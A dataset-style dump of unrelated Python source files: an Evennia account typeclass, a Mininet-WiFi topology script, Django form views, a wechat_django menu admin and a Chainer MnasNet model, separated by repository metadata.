happens on-demand first time the object is used or activated
in some way after being created but also after each server
restart or reload. In the case of account objects, this usually
happens the moment the account logs in or reconnects after a
reload.
"""
pass
# Note that the hooks below also exist in the character object's
# typeclass. You can often ignore these and rely on the character
# ones instead, unless you are implementing a multi-character game
# and have some things that should be done regardless of which
# character is currently connected to this account.
def at_first_save(self):
"""
This is a generic hook called by Evennia when this object is
saved to the database the very first time. You generally
don't override this method but the hooks called by it.
"""
self.basetype_setup()
self.at_account_creation()
permissions = settings.PERMISSION_ACCOUNT_DEFAULT
if hasattr(self, "_createdict"):
# this will only be set if the utils.create_account
# function was used to create the object.
cdict = self._createdict
if cdict.get("locks"):
self.locks.add(cdict["locks"])
if cdict.get("permissions"):
permissions = cdict["permissions"]
del self._createdict
self.permissions.batch_add(*permissions)
def at_access(self, result, accessing_obj, access_type, **kwargs):
"""
This is triggered after an access-call on this Account has
completed.
Args:
result (bool): The result of the access check.
accessing_obj (any): The object requesting the access
check.
access_type (str): The type of access checked.
Kwargs:
kwargs (any): These are passed on from the access check
and can be used to relay custom instructions from the
check mechanism.
Notes:
This method cannot affect the result of the lock check and
its return value is not used in any way. It can be used
e.g. to customize error messages in a central location or
create other effects based on the access result.
"""
pass
def at_cmdset_get(self, **kwargs):
"""
Called just *before* cmdsets on this account are requested by
the command handler. The cmdsets are available as
`self.cmdset`. If changes need to be done on the fly to the
cmdset before passing them on to the cmdhandler, this is the
place to do it. This is called also if the account currently
have no cmdsets. kwargs are usually not used unless the
cmdset is generated dynamically.
"""
pass
def at_first_login(self, **kwargs):
"""
Called the very first time this account logs into the game.
Note that this is called *before* at_pre_login, so no session
is established and usually no character is yet assigned at
this point. This hook is intended for account-specific setup
like configurations.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_pre_login(self, **kwargs):
"""
Called every time the user logs in, just before the actual
login-state is set.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def _send_to_connect_channel(self, message):
"""
Helper method for loading and sending to the comm channel
dedicated to connection messages.
Args:
message (str): A message to send to the connect channel.
"""
global _CONNECT_CHANNEL
if not _CONNECT_CHANNEL:
try:
_CONNECT_CHANNEL = ChannelDB.objects.filter(db_key=settings.DEFAULT_CHANNELS[1]["key"])[0]
except Exception:
logger.log_trace()
now = timezone.now()
now = "%02i-%02i-%02i(%02i:%02i)" % (now.year, now.month,
now.day, now.hour, now.minute)
if _CONNECT_CHANNEL:
_CONNECT_CHANNEL.tempmsg("[%s, %s]: %s" % (_CONNECT_CHANNEL.key, now, message))
else:
logger.log_info("[%s]: %s" % (now, message))
def at_post_login(self, session=None, **kwargs):
"""
Called at the end of the login process, just before letting
the account loose.
Args:
session (Session, optional): Session logging in, if any.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
Notes:
This is called *before* an eventual Character's
`at_post_login` hook. By default it is used to set up
auto-puppeting based on `MULTISESSION_MODE`.
"""
# if we have saved protocol flags on ourselves, load them here.
protocol_flags = self.attributes.get("_saved_protocol_flags", None)
if session and protocol_flags:
session.update_flags(**protocol_flags)
# inform the client that we logged in through an OOB message
if session:
session.msg(logged_in={})
self._send_to_connect_channel("|G%s connected|n" % self.key)
if _MULTISESSION_MODE == 0:
# in this mode we should have only one character available. We
# try to auto-connect to our last conneted object, if any
try:
self.puppet_object(session, self.db._last_puppet)
except RuntimeError:
self.msg("The Character does not exist.")
return
elif _MULTISESSION_MODE == 1:
# in this mode all sessions connect to the same puppet.
try:
self.puppet_object(session, self.db._last_puppet)
except RuntimeError:
self.msg("The Character does not exist.")
return
elif _MULTISESSION_MODE in (2, 3):
# In this mode we by default end up at a character selection
# screen. We execute look on the account.
# we make sure to clean up the _playable_characers list in case
# any was deleted in the interim.
self.db._playable_characters = [char for char in self.db._playable_characters if char]
self.msg(self.at_look(target=self.db._playable_characters,
session=session))
def at_failed_login(self, session, **kwargs):
"""
Called by the login process if a user account is targeted correctly
but provided with an invalid password. By default it does nothing,
but exists to be overriden.
Args:
session (session): Session logging in.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_disconnect(self, reason=None, **kwargs):
"""
Called just before user is disconnected.
Args:
reason (str, optional): The reason given for the disconnect,
(echoed to the connection channel by default).
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
reason = " (%s)" % reason if reason else ""
self._send_to_connect_channel("|R%s disconnected%s|n" % (self.key, reason))
def at_post_disconnect(self, **kwargs):
"""
This is called *after* disconnection is complete. No messages
can be relayed to the account from here. After this call, the
account should not be accessed any more, making this a good
spot for deleting it (in the case of a guest account account,
for example).
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_msg_receive(self, text=None, from_obj=None, **kwargs):
"""
This hook is called whenever someone sends a message to this
object using the `msg` method.
Note that from_obj may be None if the sender did not include
itself as an argument to the obj.msg() call - so you have to
check for this. .
Consider this a pre-processing method before msg is passed on
to the user session. If this method returns False, the msg
will not be passed on.
Args:
text (str, optional): The message received.
from_obj (any, optional): The object sending the message.
Kwargs:
This includes any keywords sent to the `msg` method.
Returns:
receive (bool): If this message should be received.
Notes:
If this method returns False, the `msg` operation
will abort without sending the message.
"""
return True
def at_msg_send(self, text=None, to_obj=None, **kwargs):
"""
This is a hook that is called when *this* object sends a
message to another object with `obj.msg(text, to_obj=obj)`.
Args:
text (str, optional): Text to send.
to_obj (any, optional): The object to send to.
Kwargs:
Keywords passed from msg()
Notes:
Since this method is executed by `from_obj`, if no `from_obj`
was passed to `DefaultCharacter.msg` this hook will never
get called.
"""
pass
def at_server_reload(self):
"""
This hook is called whenever the server is shutting down for
restart/reboot. If you want to, for example, save
non-persistent properties across a restart, this is the place
to do it.
"""
pass
def at_server_shutdown(self):
"""
This hook is called whenever the server is shutting down fully
(i.e. not for a restart).
"""
pass
def at_look(self, target=None, session=None, **kwargs):
"""
Called when this object executes a look. It allows to customize
just what this means.
Args:
target (Object or list, optional): An object or a list
objects to inspect.
session (Session, optional): The session doing this look.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
Returns:
look_string (str): A prepared look string, ready to send
off to any recipient (usually to ourselves)
"""
if target and not is_iter(target):
# single target - just show it
return target.return_appearance(self)
else:
# list of targets - make list to disconnect from db
characters = list(tar for tar in target if tar) if target else []
sessions = self.sessions.all()
is_su = self.is_superuser
# text shown when looking in the ooc area
result = ["Account |g%s|n (you are Out-of-Character)" % self.key]
nsess = len(sessions)
result.append(nsess == 1 and "\n\n|wConnected session:|n" or "\n\n|wConnected sessions (%i):|n" % nsess)
for isess, sess in enumerate(sessions):
csessid = sess.sessid
addr = "%s (%s)" % (sess.protocol_key, isinstance(sess.address, tuple) and
str(sess.address[0]) or str(sess.address))
result.append("\n %s %s" % (session.sessid == csessid and "|w* %s|n" % (isess + 1) or
" %s" % (isess + 1), addr))
result.append("\n\n |whelp|n - more commands")
result.append("\n |wooc <Text>|n - talk on public channel")
charmax = _MAX_NR_CHARACTERS if _MULTISESSION_MODE > 1 else 1
if is_su or len(characters) < charmax:
if not characters:
result.append("\n\n You don't have any characters yet. See |whelp @charcreate|n for creating one.")
else:
result.append("\n |w@charcreate <name> [=description]|n - create new character")
result.append("\n |w@chardelete <name>|n - delete a character (cannot be undone!)")
if characters:
string_s_ending = len(characters) > 1 and "s" or ""
result.append("\n |w@ic <character>|n - enter the game (|w@ooc|n to get back here)")
if is_su:
result.append("\n\nAvailable character%s (%i/unlimited):" % (string_s_ending, len(characters)))
else:
result.append("\n\nAvailable character%s%s:"
% (string_s_ending, charmax > 1 and " (%i/%i)" % (len(characters), charmax) or ""))
for char in characters:
csessions = char.sessions.all()
if csessions:
for sess in csessions:
# character is already puppeted
sid = sess in sessions and sessions.index(sess) + 1
if sess and sid:
result.append("\n - |G%s|n [%s] (played by you in session %i)"
% (char.key, ", ".join(char.permissions.all()), sid))
else:
result.append("\n - |R%s|n [%s] (played by someone else)"
% (char.key, ", ".join(char.permissions.all())))
else:
# character is "free to puppet"
result.append("\n - %s [%s]" % (char.key, ", ".join(char.permissions.all())))
look_string = ("-" * 68) + "\n" + "".join(result) + "\n" + ("-" * 68)
return look_string
class DefaultGuest(DefaultAccount):
"""
This class is used for guest logins. Unlike Accounts, Guests and
their characters are deleted after disconnection.
"""
def at_post_login(self, session=None, **kwargs):
"""
In theory, guests only have one character regardless of which
MULTISESSION_MODE we're in. They don't get a choice.
Args:
session (Session, optional): Session connecting.
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
self._send_to_connect_channel("|G%s connected|n" % self.key)
self.puppet_object(session, self.db._last_puppet)
def at_server_shutdown(self):
"""
We repeat the functionality of `at_disconnect()` here just to
be on the safe side.
"""
super(DefaultGuest, self).at_server_shutdown()
characters = self.db._playable_characters
for character in characters:
if character:
print "deleting Character:", character
character.delete()
def at_post_disconnect(self, **kwargs):
"""
Once having disconnected, destroy the guest's characters and
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
super(DefaultGuest, self).at_post_disconnect()
characters = self.db._playable_characters
for character in characters:
if character:
character.delete()
self.delete()
| [
"[email protected]"
] | |
e2fdf25b7497cc5c1fcb0bf489b3eb9332e5bb62 | 5faa3f139f30c0d290e327e04e3fd96d61e2aabb | /mininet-wifi/SWITCHON-2015/allWirelessNetworksAroundUs.py | 4e0c7e784e0db877764da170ac32d83db2baa977 | [] | no_license | hongyunnchen/reproducible-research | c6dfc3cd3c186b27ab4cf25949470b48d769325a | ed3a7a01b84ebc9bea96c5b02e0c97705cc2f7c6 | refs/heads/master | 2021-05-07T08:24:09.586976 | 2017-10-31T13:08:05 | 2017-10-31T13:08:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,525 | py | #!/usr/bin/python
"""This example is based on this video: https://www.youtube.com/watch?v=_C4H2gBdyQY"""
from mininet.net import Mininet
from mininet.node import Controller, OVSKernelSwitch, OVSKernelAP
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import os
def topology():
"Create a network."
net = Mininet( controller=Controller, link=TCLink, switch=OVSKernelSwitch, accessPoint=OVSKernelAP )
print "*** Creating nodes"
sta1 = net.addStation( 'sta1', wlans=2, ip='10.0.0.2/8', max_x=120, max_y=50, min_v=1.4, max_v=1.6 )
h1 = net.addHost( 'h1', mac='00:00:00:00:00:01', ip='10.0.0.1/8' )
ap1 = net.addAccessPoint( 'ap1', ssid='ssid_ap1', mode= 'g', channel=6, position='70,25,0' )
ap2 = net.addAccessPoint( 'ap2', ssid='ssid_ap2', mode= 'g', channel=1, position='30,25,0' )
ap3 = net.addAccessPoint( 'ap3', ssid='ssid_ap3', mode= 'g', channel=11, position='110,25,0' )
s4 = net.addSwitch( 's4', mac='00:00:00:00:00:10' )
c1 = net.addController( 'c1', controller=Controller )
print "*** Configuring wifi nodes"
net.configureWifiNodes()
print "*** Associating and Creating links"
net.addLink(ap1, s4)
net.addLink(ap2, s4)
net.addLink(ap3, s4)
net.addLink(s4, h1)
sta1.cmd('modprobe bonding mode=3')
sta1.cmd('ip link add bond0 type bond')
sta1.cmd('ip link set bond0 address 02:01:02:03:04:08')
sta1.cmd('ip link set sta1-wlan0 down')
sta1.cmd('ip link set sta1-wlan0 address 00:00:00:00:00:11')
sta1.cmd('ip link set sta1-wlan0 master bond0')
sta1.cmd('ip link set sta1-wlan1 down')
sta1.cmd('ip link set sta1-wlan1 address 00:00:00:00:00:12')
sta1.cmd('ip link set sta1-wlan1 master bond0')
sta1.cmd('ip addr add 10.0.0.10/8 dev bond0')
sta1.cmd('ip link set bond0 up')
'seed'
net.seed(12)
'plotting graph'
net.plotGraph(max_x=140, max_y=140)
"*** Available models: RandomWalk, TruncatedLevyWalk, RandomDirection, RandomWaypoint, GaussMarkov ***"
net.startMobility(startTime=0, model='RandomDirection')
print "*** Starting network"
net.build()
c1.start()
s4.start( [c1] )
ap1.start( [c1] )
ap2.start( [c1] )
ap3.start( [c1] )
sta1.cmd('ip addr del 10.0.0.2/8 dev sta1-wlan0')
os.system('ovs-ofctl add-flow s4 actions=normal')
print "*** Running CLI"
CLI( net )
print "*** Stopping network"
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
topology()
| [
"[email protected]"
] | |
fc10948d86708b6f47a13b0e303228135646e05a | e76f6fdb1a2ea89d4f38ac1ed28e50a7625e21b7 | /qytdjg_learning/views/Form.py | f0c4967d53b2ea07c09c61e006a240cff2f1d5c2 | [] | no_license | collinsctk/qytdjg_learning | 4d61a2a236f0bc4bf9be8d999352a8e3c1b87408 | 72a6d6153f6ca6bf9fccad76612450fdaf83d9fd | refs/heads/master | 2020-03-24T19:45:31.145059 | 2018-07-31T06:51:14 | 2018-07-31T06:51:14 | 142,943,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
# 本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
# 教主QQ:605658506
# 亁颐堂官网www.qytang.com
# 教主技术进化论拓展你的技术新边疆
# https://ke.qq.com/course/271956?tuin=24199d8a
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import render
# 表单
# 获取客户端请求的相关信息
def requestInfo(request):
result = 'path: %s ' % request.path
result = result + '<br>host: %s ' % request.get_host()
result = result + '<br>full_path %s ' % request.get_full_path()
result = result + '<br>port: %s ' % request.get_port()
result = result + '<br>https: %s ' % request.is_secure()
# request.META: Python字典, 包含所有HTTP请求头
try:
result = result + '<br>Accept: %s ' % request.META['HTTP_ACCEPT']
except KeyError:
result = result + '<br>HTTP请求头获取异常'
# 下面是展示META内部的键值
# values = request.META.items()
# sorted(values)
# html = []
# for key,value in values:
# html.append('<tr><td>%s</td><td>%s</td></tr>' % (key,value))
#
# return HttpResponse('<table>%s</table>' % '\n'.join(html))
return HttpResponse(result)
# 处理表单(Form)提交的数据
def searchForm(request):
return render_to_response('search_form.html')
# def search(request):
# if 'name' in request.GET:
# message = 'You searched for:%s' % request.GET['name']
# else:
# message = 'You submmited an empty form.'
# return HttpResponse(message)
# 从数据库查询数据
from mt.models import Movie
# def search(request):
# if 'name' in request.GET:
# name = request.GET['name']
# movies = Movie.objects.filter(type__icontains=name)
# return render_to_response('search_results.html', {'movies':movies, 'query':name})
# else:
# return HttpResponse('Pls submit a search term.')
# 改进表单
def search(request):
if 'name' in request.GET:
name = request.GET['name']
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext.html', {'movies':movies, 'query':name})
else:
return render_to_response('search_form_ext.html', {'error':True})
# 简单的表单校验
def searchVerify1(request):
error = False
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
error = True
elif len(name) > 10:
error = True
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify.html', {'error':True})
def searchVerify(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
errors.append('请输入电影类型名')
elif len(name) > 10:
errors.append('电影类型名长度不能大于10')
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify2.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify2.html', {'errors':errors})
# 复杂的表单校验
def searchVerifyad(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
value1 = request.GET['value1']
value2 = request.GET['value2']
# name必须有值
if not name:
errors.append('请输入电影类型名')
if not value1:
errors.append('必须提供value1')
if not value2:
errors.append('必须提供value2')
if not errors:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verifad.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verifyad.html', {'errors':errors})
# 编写Form类
# django.forms.Form
# 在视图中使用Form对象
from mt.forms import MyForm
# from django.views.decorators.csrf import csrf_exempt
# @csrf_exempt
# from django.views.decorators.csrf import csrf_protect
# from django.middleware.csrf import get_token
# @csrf_protect
# def contact(request):
# # print(get_token(request))
# if request.method == 'POST':
# form = MyForm(request.POST)
# if form.is_valid():
# print('完成与业务相关的工作')
# return HttpResponse('OK')
# else:
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# else:
# form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# 处理CSRF问题
def contact(request):
# print(get_token(request))
if request.method == 'POST':
form = MyForm(request.POST)
if form.is_valid():
print('完成与业务相关的工作')
return HttpResponse('OK')
else:
return render(request,'my_form.html',{'form':form})
else:
form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
return render(request,'my_form.html',{'form':form})
if __name__ == "__main__":
pass | [
"[email protected]"
] | |
775c3d99a00861bd1974087e2fe75b1216b73fe6 | 421b0ae45f495110daec64ed98c31af525585c2c | /File_Handling/first_file.py | 53c72b560b6263d87c4f8e3ce01570d86ad5fb4f | [] | no_license | Pradeepsuthar/pythonCode | a2c87fb64c79edd11be54c2015f9413ddce246c4 | 14e2b397f69b3fbebde5b3af98898c4ff750c28c | refs/heads/master | 2021-02-18T05:07:40.402466 | 2020-03-05T13:14:15 | 2020-03-05T13:14:15 | 245,163,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # python provied function and methos to preform such as creating, reading, opening, closing etc.
# open file in python
# Syntax
# fileobject = open(file_name[,access_mode][,buffring])
# NOTE : Default access_mode is read
# Create/Open file in write mode
# fw = open("emp.txt","w")
# write data into file
# fw.write("324156\n")
# fw.write("Pradeep Suthar\n")
# fw.write(input("Enter mobile Number : "))
# fw.close()
print("Reading file\n")
fr = open("emp.txt")
data = fr.read()
fr.close()
print("\n",data)
| [
"[email protected]"
] | |
aea70b7bae784283e27efb8fb4f2bc809628cb32 | 9bf62c04522b6b28e4d4bedd25654d0ea675f72a | /wechat_django/admin/views/menu.py | 38ce85ed5fd22d128e4d83ff133787061ea61e5f | [
"MIT"
] | permissive | x2x4com/wechat-django | 9a46cd34c4a00f515e2e315d51d6475e509ad9f0 | 926e5d2ed2895d30a253504ff252a7a52fcfe81f | refs/heads/master | 2020-05-20T02:31:08.735986 | 2019-05-01T16:03:31 | 2019-05-01T16:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,832 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib import messages
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
import object_tool
from wechatpy.exceptions import WeChatClientException
from ...models import Menu
from ..utils import get_request_params
from ..base import DynamicChoiceForm, WeChatModelAdmin
class MenuAdmin(WeChatModelAdmin):
__category__ = "menu"
__model__ = Menu
changelist_object_tools = ("sync", "publish")
change_form_template = "admin/wechat_django/menu/change_form.html"
change_list_template = "admin/wechat_django/menu/change_list.html"
list_display = (
"operates", "id", "parent_id", "title", "type", "detail", "weight",
"updated_at")
list_display_links = ("title",)
list_editable = ("weight", )
fields = (
"name", "type", "key", "url", "appid", "pagepath", "created_at",
"updated_at")
def title(self, obj):
if obj.parent:
return "|--- " + obj.name
return obj.name
title.short_description = _("title")
@mark_safe
def detail(self, obj):
rv = ""
if obj.type == Menu.Event.CLICK:
rv = obj.content.get("key")
elif obj.type == Menu.Event.VIEW:
rv = '<a href="{0}">{1}</a>'.format(
obj.content.get("url"), _("link"))
elif obj.type == Menu.Event.MINIPROGRAM:
rv = obj.content.get("appid")
return rv or ""
detail.short_description = _("detail")
@mark_safe
def operates(self, obj):
del_url = reverse("admin:wechat_django_menu_delete", kwargs=dict(
object_id=obj.id,
wechat_app_id=obj.app_id
))
rv = '<a class="deletelink" href="{0}"></a>'.format(del_url)
if not obj.parent and not obj.type and obj.sub_button.count() < 5:
query = dict(parent_id=obj.id)
add_link = reverse("admin:wechat_django_menu_add", kwargs=dict(
wechat_app_id=obj.app_id
))
add_url = "{0}?{1}".format(add_link, urlencode(query))
rv += '<a class="addlink" href="{0}"></a>'.format(add_url)
return rv
operates.short_description = _("actions")
@object_tool.confirm(short_description=_("Sync menus"))
def sync(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.sync(request.app)
return _("Menus successful synchronized")
return self._clientaction(
request, action, _("Sync menus failed with %(exc)s"))
@object_tool.confirm(short_description=_("Publish menus"))
def publish(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.publish(request.app)
return _("Menus successful published")
return self._clientaction(
request, action, _("Publish menus failed with %(exc)s"))
def get_actions(self, request):
actions = super(MenuAdmin, self).get_actions(request)
if "delete_selected" in actions:
del actions["delete_selected"]
return actions
def get_fields(self, request, obj=None):
fields = list(super(MenuAdmin, self).get_fields(request, obj))
if not obj:
fields.remove("created_at")
fields.remove("updated_at")
return fields
def get_readonly_fields(self, request, obj=None):
rv = super(MenuAdmin, self).get_readonly_fields(request, obj)
if obj:
rv = rv + ("created_at", "updated_at")
return rv
def get_queryset(self, request):
rv = super(MenuAdmin, self).get_queryset(request)
if not get_request_params(request, "menuid"):
rv = rv.filter(menuid__isnull=True)
if request.GET.get("parent_id"):
rv = rv.filter(parent_id=request.GET["parent_id"])
return rv
class MenuForm(DynamicChoiceForm):
content_field = "content"
origin_fields = ("name", "menuid", "type", "weight")
type_field = "type"
key = forms.CharField(label=_("menu key"), required=False)
url = forms.URLField(label=_("url"), required=False)
appid = forms.CharField(label=_("miniprogram app_id"), required=False)
pagepath = forms.CharField(label=_("pagepath"), required=False)
class Meta(object):
model = Menu
fields = ("name", "menuid", "type", "weight")
def allowed_fields(self, type, cleaned_data):
if type == Menu.Event.VIEW:
fields = ("url", )
elif type == Menu.Event.CLICK:
fields = ("key", )
elif type == Menu.Event.MINIPROGRAM:
fields = ("url", "appid", "apppath")
else:
fields = tuple()
return fields
form = MenuForm
def save_model(self, request, obj, form, change):
if not change and request.GET.get("parent_id"):
obj.parent_id = request.GET["parent_id"]
return super().save_model(request, obj, form, change)
def has_add_permission(self, request):
if not super(MenuAdmin, self).has_add_permission(request):
return False
# 判断菜单是否已满
q = self.get_queryset(request)
if request.GET.get("parent_id"):
return q.count() < 5
else:
return q.filter(parent_id__isnull=True).count() < 3
def get_model_perms(self, request):
return (super(MenuAdmin, self).get_model_perms(request)
if request.app.abilities.menus else {})
| [
"[email protected]"
] | |
c70f0f21ddbab3ceb6ab8740dc0a3da2d1b05679 | 8e52c27f1b2823db67db4438b2b7e22c18254eca | /chainer_/chainercv2/models/mnasnet.py | 7fc29a525f9eef9ba2765ae2e02a792b0197b0e0 | [
"MIT"
] | permissive | earhian/imgclsmob | 5582f5f2d4062b620eecc28d5c4c9245fea47291 | c87c0942420876941868c016211073dec4392e4d | refs/heads/master | 2020-04-12T02:13:55.258601 | 2018-12-17T20:38:19 | 2018-12-17T20:38:19 | 162,242,486 | 1 | 0 | MIT | 2018-12-18T06:40:42 | 2018-12-18T06:40:41 | null | UTF-8 | Python | false | false | 13,344 | py | """
MnasNet, implemented in Chainer.
Original paper: 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,' https://arxiv.org/abs/1807.11626.
"""
__all__ = ['MnasNet', 'mnasnet']
import os
import chainer.functions as F
import chainer.links as L
from chainer import Chain
from functools import partial
from chainer.serializers import load_npz
from .common import SimpleSequential
class ConvBlock(Chain):
"""
Standard convolution block with Batch normalization and ReLU activation.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the convolution.
pad : int or tuple/list of 2 int
Padding value for convolution layer.
groups : int, default 1
Number of groups.
activate : bool, default True
Whether activate the convolution block.
"""
def __init__(self,
in_channels,
out_channels,
ksize,
stride,
pad,
groups=1,
activate=True):
super(ConvBlock, self).__init__()
self.activate = activate
with self.init_scope():
self.conv = L.Convolution2D(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
pad=pad,
nobias=True,
groups=groups)
self.bn = L.BatchNormalization(
size=out_channels,
eps=1e-5)
if self.activate:
self.activ = F.relu
def __call__(self, x):
x = self.conv(x)
x = self.bn(x)
if self.activate:
x = self.activ(x)
return x
def conv1x1_block(in_channels,
out_channels,
activate=True):
"""
1x1 version of the standard convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
activate : bool, default True
Whether activate the convolution block.
"""
return ConvBlock(
in_channels=in_channels,
out_channels=out_channels,
ksize=1,
stride=1,
pad=0,
groups=1,
activate=activate)
def dwconv_block(in_channels,
out_channels,
ksize,
stride,
activate=True):
"""
Depthwise version of the standard convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the convolution.
activate : bool, default True
Whether activate the convolution block.
"""
return ConvBlock(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
pad=(ksize // 2),
groups=out_channels,
activate=activate)
class DwsConvBlock(Chain):
"""
Depthwise separable convolution block with BatchNorms and activations at each convolution layers.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
"""
def __init__(self,
in_channels,
out_channels):
super(DwsConvBlock, self).__init__()
with self.init_scope():
self.dw_conv = dwconv_block(
in_channels=in_channels,
out_channels=in_channels,
ksize=3,
stride=1)
self.pw_conv = conv1x1_block(
in_channels=in_channels,
out_channels=out_channels)
def __call__(self, x):
x = self.dw_conv(x)
x = self.pw_conv(x)
return x
class MnasUnit(Chain):
"""
MnasNet unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the second convolution layer.
expansion_factor : int
Factor for expansion of channels.
"""
def __init__(self,
in_channels,
out_channels,
ksize,
stride,
expansion_factor):
super(MnasUnit, self).__init__()
self.residual = (in_channels == out_channels) and (stride == 1)
mid_channels = in_channels * expansion_factor
with self.init_scope():
self.conv1 = conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
activate=True)
self.conv2 = dwconv_block(
in_channels=mid_channels,
out_channels=mid_channels,
ksize=ksize,
stride=stride,
activate=True)
self.conv3 = conv1x1_block(
in_channels=mid_channels,
out_channels=out_channels,
activate=False)
def __call__(self, x):
if self.residual:
identity = x
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
if self.residual:
x = x + identity
return x
class MnasInitBlock(Chain):
"""
MnasNet specific initial block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of 2 int
Numbers of output channels.
"""
def __init__(self,
in_channels,
out_channels_list):
super(MnasInitBlock, self).__init__()
with self.init_scope():
self.conv1 = ConvBlock(
in_channels=in_channels,
out_channels=out_channels_list[0],
ksize=3,
stride=2,
pad=1,
groups=1,
activate=True)
self.conv2 = DwsConvBlock(
in_channels=out_channels_list[0],
out_channels=out_channels_list[1])
def __call__(self, x):
x = self.conv1(x)
x = self.conv2(x)
return x
class MnasNet(Chain):
"""
MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
https://arxiv.org/abs/1807.11626.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : list of 2 int
Numbers of output channels for the initial unit.
final_block_channels : int
Number of output channels for the final block of the feature extractor.
ksizes : list of list of int
Number of kernel sizes for each unit.
expansion_factors : list of list of int
Number of expansion factors for each unit.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
channels,
init_block_channels,
final_block_channels,
ksizes,
expansion_factors,
in_channels=3,
in_size=(224, 224),
classes=1000):
super(MnasNet, self).__init__()
self.in_size = in_size
self.classes = classes
with self.init_scope():
self.features = SimpleSequential()
with self.features.init_scope():
setattr(self.features, "init_block", MnasInitBlock(
in_channels=in_channels,
out_channels_list=init_block_channels))
in_channels = init_block_channels[-1]
for i, channels_per_stage in enumerate(channels):
ksizes_per_stage = ksizes[i]
expansion_factors_per_stage = expansion_factors[i]
stage = SimpleSequential()
with stage.init_scope():
for j, out_channels in enumerate(channels_per_stage):
ksize = ksizes_per_stage[j]
expansion_factor = expansion_factors_per_stage[j]
stride = 2 if (j == 0) else 1
setattr(stage, "unit{}".format(j + 1), MnasUnit(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
expansion_factor=expansion_factor))
in_channels = out_channels
setattr(self.features, "stage{}".format(i + 1), stage)
setattr(self.features, 'final_block', conv1x1_block(
in_channels=in_channels,
out_channels=final_block_channels,
activate=True))
in_channels = final_block_channels
setattr(self.features, 'final_pool', partial(
F.average_pooling_2d,
ksize=7,
stride=1))
self.output = SimpleSequential()
with self.output.init_scope():
setattr(self.output, 'flatten', partial(
F.reshape,
shape=(-1, in_channels)))
setattr(self.output, 'fc', L.Linear(
in_size=in_channels,
out_size=classes))
def __call__(self, x):
x = self.features(x)
x = self.output(x)
return x
def get_mnasnet(model_name=None,
pretrained=False,
root=os.path.join('~', '.chainer', 'models'),
**kwargs):
"""
Create MnasNet model with specific parameters.
Parameters:
----------
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
init_block_channels = [32, 16]
final_block_channels = 1280
layers = [3, 3, 3, 2, 4, 1]
downsample = [1, 1, 1, 0, 1, 0]
channels_per_layers = [24, 40, 80, 96, 192, 320]
